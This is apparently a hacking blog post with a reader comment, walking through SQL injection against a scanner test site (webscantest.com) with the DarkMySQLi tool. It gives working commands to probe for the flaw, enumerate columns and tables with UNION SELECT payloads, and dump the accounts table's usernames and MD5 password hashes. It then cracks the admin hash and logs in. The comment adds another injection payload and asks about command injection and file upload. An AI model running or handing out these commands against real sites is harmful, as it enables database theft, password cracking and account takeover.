http://www.webscantest.com/
Requirements for this guide are-
-->BackTrack 5
-->DarkMySQLi
-->An Internet connection
The actual URL we will be navigating to is-
http://www.webscantest.com/datastore/search_get_by_id.php?id=4
From this URL we can see the the
id
parameter returns an integer value of 4
.Here's what the web page looks like-
If you want to check for vulnerability, then just add an apostrophe to the end of the URL, like so-
http://www.webscantest.com/datastore/search_get_by_id.php?id=4'
This is what the page will look like once you execute this request-
From this error, we can see that we are using incorrect syntax for the query we are sending to the database. We also know from this error that the remote database server is MySQL. Now we can fire up DarkMySQLi and attack the database.
First we need to find the number of columns in the database. To do this, we will use this command-
python DarkMySQLi.py -u http://www.webscantest.com/datastore/search_get_by_id.php?id=4 --findcol
Here is the output for the above command-
From the output we can see that the column length is
4
. But we also see two URL's- the actual URL used to enumerate the column length, and a URL generated by DarkMySQLi. The DarkMySQLi URL is the URL we will use for this tool. If you want to browse to the real URL, hold down Ctrl and click the real URL inside your Terminal window (not the DarkMySQLi URL).Now we want to find all the tables of the database. We can do this easily with the --full option, which will help us enumerate everything we can. To do this, type-
python ./DarkMySQLi.py -u http://www.webscantest.com/datastore/search_get_by_id.php?id=4+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de-- --full
This command will enumerate everything possible. This switch (--full) only works for MySQL v5.0 and above. :)
Here is the output-
Now we have the name of the database, the names of all the tables in the database, and the names of all the columns for each table. I am going to
gather all the data from the accounts table with the following command-
python ./DarkMySQLi.py -u http://www.webscantest.com/datastore/search_get_by_id.php?id=4+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de-- -D scanme -T accounts -C id,uname,passwd,fname,lname --dump
It's a rather long command, but it will extract all data from the database. Here is the output-
From the output shown above, we have successfully extracted all data from the database. It takes a couple seconds, but you should be able to read the output just fine.
Now think about the order of the command you used. If we listed id,uname,passwd,fname, and lname (in that order), then the output will be in the same order. This means that if the first row of data looks like this-
1:admin:21232f297a57a5a743894a0e4a801fc3
then the id is
1
, the uname is admin
, and the passwd is 21232f297a57a5a743894a0e4a801fc3
. Looks like an MD5 hash. Let's save it to a text file and crack it with lcrack
-From the output of lcrack, the username is
admin
(duh) and the password is admin
. Navigate to-http://www.webscantest.com/login.php
and log in with the username admin and the password admin. Happy Hacking! :)
(To download lcrack, type in
apt-get install lcrack
)
Very nice... with a few quick test... ran threw tcpdump im trying to understand how somethings work...
ReplyDeleteim trying to execute custom commands with the results of --findcol...
trying to check if writing is possible... sqli is all new to me so it seems your tool uses advanced functions that i dont understand
?s=55+AND+1=2+UNION+SELECT+1,dark,3,4,dark,dark,dark,dark--
maybe your tool already provides custom command injection and file upload function?
i8igmac online freenode or @yahoo.com